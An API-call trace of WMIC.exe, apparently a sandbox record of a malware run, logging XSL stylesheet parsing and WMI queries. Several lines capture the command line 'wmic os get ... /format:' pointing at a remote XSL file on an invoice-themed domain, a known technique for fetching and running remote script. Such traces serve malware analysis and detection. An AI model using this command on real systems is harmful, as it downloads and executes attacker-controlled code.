[0058.926] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.926] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0058.926] SysStringLen (param_1="wmiclitableformat") returned 0x11
[0058.926] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0058.926] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13
[0058.926] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.926] SysStringLen (param_1="wmiclimofformat") returned 0xf
[0058.926] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.926] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.926] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.926] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=19, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.926] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="textvaluelist.xsl") returned 0x0
[0058.926] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.926] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.927] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="wmiclivalueformat.xsl", varVal2=0x0)) returned 0x0
[0058.927] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0058.927] SysStringLen (param_1="TABLE") returned 0x5
[0058.927] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0058.927] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.927] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0058.927] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.927] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0058.927] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.927] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.927] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0058.927] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.927] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.927] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.927] IXMLDOMNodeList:get_item (in: This=0x16b8e80, index=20, listItem=0xcf5f0 | out: listItem=0xcf5f0*=0x16b4b20) returned 0x0
[0058.927] IXMLDOMNode:get_text (in: This=0x16b4b20, text=0xcf5f8 | out: text=0xcf5f8*="textvaluelist.xsl") returned 0x0
[0058.927] IXMLDOMNode:get_attributes (in: This=0x16b4b20, attributeMap=0xcf5ec | out: attributeMap=0xcf5ec*=0x16b8cf8) returned 0x0
[0058.928] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x16b8cf8, name="KEYWORD", namedItem=0xcf5e8 | out: namedItem=0xcf5e8*=0x16b8c98) returned 0x0
[0058.928] IXMLDOMNode:get_nodeValue (in: This=0x16b8c98, value=0xcf594 | out: value=0xcf594*(varType=0x8, wReserved1=0x7, wReserved2=0x2d90, wReserved3=0x7, varVal1="wmiclivalueformat", varVal2=0x0)) returned 0x0
[0058.928] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0058.928] SysStringLen (param_1="TABLE") returned 0x5
[0058.928] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0058.928] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
[0058.928] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0058.928] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
[0058.928] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0058.928] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.928] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0058.928] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15
[0058.928] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
[0058.928] SysStringLen (param_1="wmiclivalueformat") returned 0x11
[0058.929] IUnknown:Release (This=0x16b4b20) returned 0x0
[0058.929] IUnknown:Release (This=0x16b8cf8) returned 0x0
[0058.929] IUnknown:Release (This=0x16b8c98) returned 0x0
[0058.929] IUnknown:Release (This=0x16b8e80) returned 0x0
[0058.929] FreeThreadedDOMDocument:IUnknown:Release (This=0x16b8c58) returned 0x1
[0058.929] FreeThreadedDOMDocument:IUnknown:Release (This=0x16b4630) returned 0x0
[0058.929] GetCommandLineW () returned="\"C:\\Windows\\system32\\wbem\\WMIC.exe\" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\""
[0058.929] memcpy_s (in: _Destination=0x1d72ea8, _DestinationSize=0x12e, _Source=0x231644, _SourceSize=0x12c | out: _Destination=0x1d72ea8) returned 0x0
[0058.929] GetLocalTime (in: lpSystemTime=0xcf5a0 | out: lpSystemTime=0xcf5a0*(wYear=0x7e2, wMonth=0xa, wDayOfWeek=0x1, wDay=0x16, wHour=0x3, wMinute=0x1a, wSecond=0x2f, wMilliseconds=0x276))
[0058.929] _vsnwprintf (in: _Buffer=0x1d705b0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xcf580 | out: _Buffer="10-22-2018T03:26:47") returned 19
[0058.929] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.929] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.929] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.929] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.930] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.930] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.930] lstrlenW (lpString="os") returned 2
[0058.930] _wcsicmp (_String1="os", _String2="\"NULL\"") returned 77
[0058.930] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.930] lstrlenW (lpString="get") returned 3
[0058.931] _wcsicmp (_String1="get", _String2="\"NULL\"") returned 69
[0058.931] memmove_s (in: _Destination=0x7f2b8, _DestinationSize=0x4, _Source=0x72ee0, _SourceSize=0x4 | out: _Destination=0x7f2b8) returned 0x0
[0058.931] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.931] lstrlenW (lpString="XBRSEWYL") returned 8
[0058.931] _wcsicmp (_String1="XBRSEWYL", _String2="\"NULL\"") returned 86
[0058.931] memmove_s (in: _Destination=0x7ed08, _DestinationSize=0x8, _Source=0x7f2b8, _SourceSize=0x8 | out: _Destination=0x7ed08) returned 0x0
[0058.931] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.931] lstrlenW (lpString=",") returned 1
[0058.931] memmove_s (in: _Destination=0x7ed20, _DestinationSize=0xc, _Source=0x7ed08, _SourceSize=0xc | out: _Destination=0x7ed20) returned 0x0
[0058.931] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.931] lstrlenW (lpString="freephysicalmemory") returned 18
[0058.931] _wcsicmp (_String1="freephysicalmemory", _String2="\"NULL\"") returned 68
[0058.932] memmove_s (in: _Destination=0x7e300, _DestinationSize=0x10, _Source=0x7ed20, _SourceSize=0x10 | out: _Destination=0x7e300) returned 0x0
[0058.932] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.932] lstrlenW (lpString="/") returned 1
[0058.932] lstrlenW (lpString=" os get XBRSEWYL, freephysicalmemory /format:\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 115
[0058.932] lstrlenW (lpString="ASSOC") returned 5
[0058.932] lstrlenW (lpString="format") returned 6
[0058.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="ASSOC", cchCount2=5) returned 3
[0058.932] lstrlenW (lpString="FORMAT") returned 6
[0058.932] lstrlenW (lpString="format") returned 6
[0058.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="format", cchCount1=6, lpString2="FORMAT", cchCount2=6) returned 2
[0058.932] lstrlenW (lpString="/") returned 1
[0058.932] lstrlenW (lpString="/") returned 1
[0058.932] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
[0058.932] lstrlenW (lpString="format") returned 6
[0058.932] _wcsicmp (_String1="format", _String2="\"NULL\"") returned 68
[0058.932] lstrlenW (lpString="format") returned 6
[0058.932] memmove_s (in: _Destination=0x7f3c0, _DestinationSize=0x18, _Source=0x7e300, _SourceSize=0x18 | out: _Destination=0x7f3c0) returned 0x0
[0058.932] lstrlenW (lpString="\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 69
[0058.932] _wcsicmp (_String1="\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"", _String2="\"NULL\"") returned -6
[0058.932] lstrlenW (lpString="\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 69
[0058.932] lstrlenW (lpString="\"http://lkvmjudf74279701.nota-fiscal01.com:25008/04/v131.xsl?3338641\"") returned 69
[0058.933] lstrlenW (lpString="QUIT") returned 4
[0058.933] lstrlenW (lpString="os") returned 2
[0058.933] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="QUIT", cchCount2=4) returned 1
[0058.933] lstrlenW (lpString="EXIT") returned 4
[0058.933] lstrlenW (lpString="os") returned 2
[0058.933] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="EXIT", cchCount2=4) returned 3
[0058.933] WbemLocator:IUnknown:AddRef (This=0x490828) returned 0x2
[0058.933] lstrlenW (lpString="/") returned 1
[0058.933] lstrlenW (lpString="os") returned 2
[0058.933] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="/", cchCount2=1) returned 3
[0058.933] lstrlenW (lpString="-") returned 1
[0058.933] lstrlenW (lpString="os") returned 2
[0058.933] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="-", cchCount2=1) returned 3
[0058.933] lstrlenW (lpString="CLASS") returned 5
[0058.933] lstrlenW (lpString="os") returned 2
[0058.933] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CLASS", cchCount2=5) returned 3
[0058.933] lstrlenW (lpString="PATH") returned 4
[0058.933] lstrlenW (lpString="os") returned 2
[0058.933] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="PATH", cchCount2=4) returned 1
[0058.933] lstrlenW (lpString="CONTEXT") returned 7
[0058.933] lstrlenW (lpString="os") returned 2
[0058.933] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="os", cchCount1=2, lpString2="CONTEXT", cchCount2=7) returned 3
[0058.933] lstrlenW (lpString="os") returned 2
[0058.933] lstrlenW (lpString="os") returned 2
[0058.934] GetCurrentThreadId () returned 0xa9c
[0058.934] ??0CHString@@QAE@XZ () returned 0xcf4f4
[0058.934] WbemLocator:IWbemLocator:ConnectServer (in: This=0x490828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8dc1e0 | out: ppNamespace=0x8dc1e0*=0x49c74c) returned 0x0
[0058.951] CoSetProxyBlanket (pProxy=0x49c74c, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0
[0058.951] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.951] GetCurrentThreadId () returned 0xa9c
[0058.951] ??0CHString@@QAE@XZ () returned 0xcf48c
[0058.951] SysStringLen (param_1="root\\cli") returned 0x8
[0058.951] SysStringLen (param_1="\\") returned 0x1
[0058.952] SysStringLen (param_1="root\\cli\\") returned 0x9
[0058.952] SysStringLen (param_1="ms_409") returned 0x6
[0058.952] WbemLocator:IWbemLocator:ConnectServer (in: This=0x490828, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x8dc1e4 | out: ppNamespace=0x8dc1e4*=0x49c7cc) returned 0x0
[0058.956] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.956] GetCurrentThreadId () returned 0xa9c
[0058.956] ??0CHString@@QAE@XZ () returned 0xcf4f8
[0058.956] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28
[0058.956] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x891f7c, cbMultiByte=-1, lpWideCharStr=0x7f348, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29
[0058.957] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c
[0058.957] SysStringLen (param_1="os") returned 0x2
[0058.957] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='os") returned 0x1e
[0058.957] SysStringLen (param_1="'") returned 0x1
[0058.957] IWbemServices:GetObject (in: This=0x49c74c, strObjectPath="MSFT_CliAlias.FriendlyName='os'", lFlags=0, pCtx=0x0, ppObject=0xcf4f4*=0x0, ppCallResult=0x0 | out: ppObject=0xcf4f4*=0x4bc508, ppCallResult=0x0) returned 0x0
[0058.979] IWbemClassObject:Get (in: This=0x4bc508, wszName="Target", lFlags=0, pVal=0xcf4b4*(varType=0x0, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8c, varVal1=0xffffffff, varVal2=0x89a03c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf4b4*(varType=0x8, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8c, varVal1="Select * from Win32_OperatingSystem", varVal2=0x89a03c), pType=0x0, plFlavor=0x0) returned 0x0
[0058.979] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
[0058.979] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
[0058.979] IWbemClassObject:Get (in: This=0x4bc508, wszName="PWhere", lFlags=0, pVal=0xcf4b4*(varType=0x0, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8c, varVal1=0x2542f4, varVal2=0x89a03c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf4b4*(varType=0x8, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8c, varVal1="", varVal2=0x89a03c), pType=0x0, plFlavor=0x0) returned 0x0
[0058.979] lstrlenW (lpString="") returned 0
[0058.979] lstrlenW (lpString="") returned 0
[0058.979] IWbemClassObject:Get (in: This=0x4bc508, wszName="Connection", lFlags=0, pVal=0xcf4b4*(varType=0x0, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8c, varVal1=0x29cbe4, varVal2=0x89a03c), pType=0x0, plFlavor=0x0 | out: pVal=0xcf4b4*(varType=0xd, wReserved1=0xc, wReserved2=0xe58c, wReserved3=0x8c, varVal1=0x4bc8c8, varVal2=0x89a03c), pType=0x0, plFlavor=0x0) returned 0x0
[0058.979] IUnknown:QueryInterface (in: This=0x4bc8c8, riid=0x896b50*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0xcf4ec | out: ppvObject=0xcf4ec*=0x4bc8c8) returned 0x0
[0058.980] GetCurrentThreadId () returned 0xa9c
[0058.980] ??0CHString@@QAE@XZ () returned 0xcf468
[0058.980] IWbemClassObject:Get (in: This=0x4bc8c8, wszName="Namespace", lFlags=0, pVal=0xcf438*(varType=0x0, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf438*(varType=0x8, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1="ROOT\\CIMV2", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0058.980] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0058.980] lstrlenW (lpString="ROOT\\CIMV2") returned 10
[0058.980] IWbemClassObject:Get (in: This=0x4bc8c8, wszName="Locale", lFlags=0, pVal=0xcf438*(varType=0x0, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=0x29cbe4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf438*(varType=0x8, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1="ms_409", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0058.980] lstrlenW (lpString="ms_409") returned 6
[0058.980] lstrlenW (lpString="ms_409") returned 6
[0058.980] IWbemClassObject:Get (in: This=0x4bc8c8, wszName="User", lFlags=0, pVal=0xcf438*(varType=0x0, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=0x29cbe4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf438*(varType=0x1, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=0x29cbe4, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0058.980] IWbemClassObject:Get (in: This=0x4bc8c8, wszName="Password", lFlags=0, pVal=0xcf438*(varType=0x1, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=0x29cbe4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf438*(varType=0x1, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=0x29cbe4, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0058.981] IWbemClassObject:Get (in: This=0x4bc8c8, wszName="Server", lFlags=0, pVal=0xcf438*(varType=0x1, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=0x29cbe4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf438*(varType=0x8, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=".", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0058.981] lstrlenW (lpString=".") returned 1
[0058.981] lstrlenW (lpString=".") returned 1
[0058.981] IWbemClassObject:Get (in: This=0x4bc8c8, wszName="Authority", lFlags=0, pVal=0xcf438*(varType=0x0, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=0x29cbe4, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf438*(varType=0x1, wReserved1=0x0, wReserved2=0xed80, wReserved3=0x7, varVal1=0x29cbe4, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
[0058.981] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.981] IUnknown:Release (This=0x4bc8c8) returned 0x1
[0058.981] GetCurrentThreadId () returned 0xa9c
[0058.981] ??0CHString@@QAE@XZ () returned 0xcf460
[0058.981] IWbemClassObject:Get (in: This=0x4bc508, wszName="__RELPATH", lFlags=0, pVal=0xcf440*(varType=0x0, wReserved1=0x6e79, wReserved2=0x0, wReserved3=0x49, varVal1=0x0, varVal2=0x4bc8c8), pType=0x0, plFlavor=0x0 | out: pVal=0xcf440*(varType=0x8, wReserved1=0x6e79, wReserved2=0x0, wReserved3=0x49, varVal1="MSFT_CliAlias.FriendlyName=\"OS\"", varVal2=0x4bc8c8), pType=0x0, plFlavor=0x0) returned 0x0
[0058.981] GetCurrentThreadId () returned 0xa9c
[0058.981] ??0CHString@@QAE@XZ () returned 0xcf3f0
[0058.981] ??0CHString@@QAE@PBG@Z () returned 0xcf3dc
[0058.982] ??0CHString@@QAE@ABV0@@Z () returned 0xcf37c
[0058.982] ?Empty@CHString@@QAEXXZ () returned 0x6f900510
[0058.982] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x7f488
[0058.982] ?Find@CHString@@QBEHPBG@Z () returned 0x1b
[0058.982] ?Left@CHString@@QBE?AV1@H@Z () returned 0xcf35c
[0058.982] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xcf360
[0058.982] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xcf3dc
[0058.982] ??1CHString@@QAE@XZ () returned 0x1
[0058.982] ??1CHString@@QAE@XZ () returned 0x1
[0058.982] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xcf358
[0058.982] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xcf37c
[0058.982] ??1CHString@@QAE@XZ () returned 0x1
[0058.982] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x7e340
[0058.982] ?Find@CHString@@QBEHPBG@Z () returned 0x2
[0058.982] ?Left@CHString@@QBE?AV1@H@Z () returned 0xcf35c
[0058.982] ??H@YG?AVCHString@@ABV0@PBG@Z () returned 0xcf360
[0058.982] ??YCHString@@QAEABV0@ABV0@@Z () returned 0xcf3dc
[0058.982] ??1CHString@@QAE@XZ () returned 0x7a0001
[0058.982] ??1CHString@@QAE@XZ () returned 0x760001
[0058.982] ?Mid@CHString@@QBE?AV1@H@Z () returned 0xcf358
[0058.982] ??4CHString@@QAEABV0@ABV0@@Z () returned 0xcf37c
[0058.982] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.982] ?GetData@CHString@@IBEPAUCHStringData@@XZ () returned 0x6f900504
[0058.982] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.983] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=") returned 0x3c
[0058.983] SysStringLen (param_1="\"Description\",RelPath=\"") returned 0x17
[0058.983] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"") returned 0x53
[0058.983] SysStringLen (param_1="MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x21
[0058.983] SysStringLen (param_1="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"") returned 0x74
[0058.983] SysStringLen (param_1="\"") returned 0x1
[0058.984] IWbemServices:GetObject (in: This=0x49c7cc, strObjectPath="MSFT_LocalizablePropertyValue.ObjectLocator=\"\",PropertyName=\"Description\",RelPath=\"MSFT_CliAlias.FriendlyName=\\\"OS\\\"\"", lFlags=0, pCtx=0x0, ppObject=0xcf3f8*=0x0, ppCallResult=0x0 | out: ppObject=0xcf3f8*=0x4bc960, ppCallResult=0x0) returned 0x0
[0058.988] IWbemClassObject:Get (in: This=0x4bc960, wszName="Text", lFlags=0, pVal=0xcf3a4*(varType=0x0, wReserved1=0x25, wReserved2=0x42f4, wReserved3=0x25, varVal1=0x3e, varVal2=0x8dc1e0), pType=0x0, plFlavor=0x0 | out: pVal=0xcf3a4*(varType=0x2008, wReserved1=0x25, wReserved2=0x42f4, wReserved3=0x25, varVal1=0x276858*(cDims=0x1, fFeatures=0x180, cbElements=0x4, cLocks=0x0, pvData=0x2905a0, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x8dc1e0), pType=0x0, plFlavor=0x0) returned 0x0
[0058.989] SafeArrayGetLBound (in: psa=0x276858, nDim=0x1, plLbound=0xcf3bc | out: plLbound=0xcf3bc) returned 0x0
[0058.989] SafeArrayGetUBound (in: psa=0x276858, nDim=0x1, plUbound=0xcf3b8 | out: plUbound=0xcf3b8) returned 0x0
[0058.989] SafeArrayGetElement (in: psa=0x276858, rgIndices=0xcf41c, pv=0xcf3e4 | out: pv=0xcf3e4) returned 0x0
[0058.989] SysStringLen (param_1="Installed Operating System/s management. ") returned 0x29
[0058.989] IUnknown:Release (This=0x4bc960) returned 0x0
[0058.989] ??1CHString@@QAE@XZ () returned 0x1
[0058.989] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.989] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.989] lstrlenW (lpString="Installed Operating System/s management. ") returned 41
[0058.989] lstrlenW (lpString="Installed Operating System/s management. ") returned 41
[0058.989] IUnknown:Release (This=0x4bc508) returned 0x0
[0058.990] ??1CHString@@QAE@XZ () returned 0x6f900504
[0058.990] lstrlenW (lpString="PATH") returned 4
[0058.990] lstrlenW (lpString="get") returned 3
[0058.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="PATH", cchCount2=4) returned 1
[0058.990] lstrlenW (lpString="WHERE") returned 5
[0058.990] lstrlenW (lpString="get") returned 3
[0058.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="WHERE", cchCount2=5) returned 1
[0058.990] lstrlenW (lpString="(") returned 1
[0058.990] lstrlenW (lpString="get") returned 3
[0058.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="(", cchCount2=1) returned 3
[0058.990] lstrlenW (lpString="/") returned 1
[0058.990] lstrlenW (lpString="get") returned 3
[0058.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
[0058.990] lstrlenW (lpString="-") returned 1
[0058.990] lstrlenW (lpString="get") returned 3
[0058.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
[0058.990] lstrlenW (lpString="GET") returned 3
[0058.990] lstrlenW (lpString="get") returned 3
[0058.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0058.990] lstrlenW (lpString="/") returned 1
[0058.990] lstrlenW (lpString="get") returned 3
[0058.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="/", cchCount2=1) returned 3
[0058.990] lstrlenW (lpString="-") returned 1
[0058.990] lstrlenW (lpString="get") returned 3
[0058.990] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="-", cchCount2=1) returned 3
[0058.991] lstrlenW (lpString="get") returned 3
[0058.991] lstrlenW (lpString="get") returned 3
[0058.991] lstrlenW (lpString="GET") returned 3
[0058.991] lstrlenW (lpString="get") returned 3
[0058.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
[0058.991] lstrlenW (lpString="/") returned 1
[0058.991] lstrlenW (lpString="XBRSEWYL") returned 8
[0058.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XBRSEWYL", cchCount1=8, lpString2="/", cchCount2=1) returned 3
[0058.991] lstrlenW (lpString="-") returned 1
[0058.991] lstrlenW (lpString="XBRSEWYL") returned 8
[0058.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="XBRSEWYL", cchCount1=8, lpString2="-", cchCount2=1) returned 3
[0058.991] lstrlenW (lpString="XBRSEWYL") returned 8
[0058.991] lstrlenW (lpString="XBRSEWYL") returned 8
[0058.991] lstrlenW (lpString=",") returned 1
[0058.991] lstrlenW (lpString=",") returned 1
[0058.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1=",", cchCount1=1, lpString2=",", cchCount2=1) returned 2
[0058.991] lstrlenW (lpString="freephysicalmemory") returned 18
[0058.991] lstrlenW (lpString="freephysicalmemory") returned 18
[0058.991] memmove_s (in: _Destination=0x7f528, _DestinationSize=0x4, _Source=0x7f4e8, _SourceSize=0x4 | out: _Destination=0x7f528) returned 0x0
[0058.991] lstrlenW (lpString=",") returned 1
[0058.991] lstrlenW (lpString="/") returned 1
[0058.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2=",", cchCount2=1) returned 3
[0058.991] lstrlenW (lpString="/") returned 1
[0058.991] lstrlenW (lpString="/") returned 1
[0058.991] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2
[0058.992] lstrlenW (lpString="?") returned 1
[0058.992] lstrlenW (lpString="format") returned 6
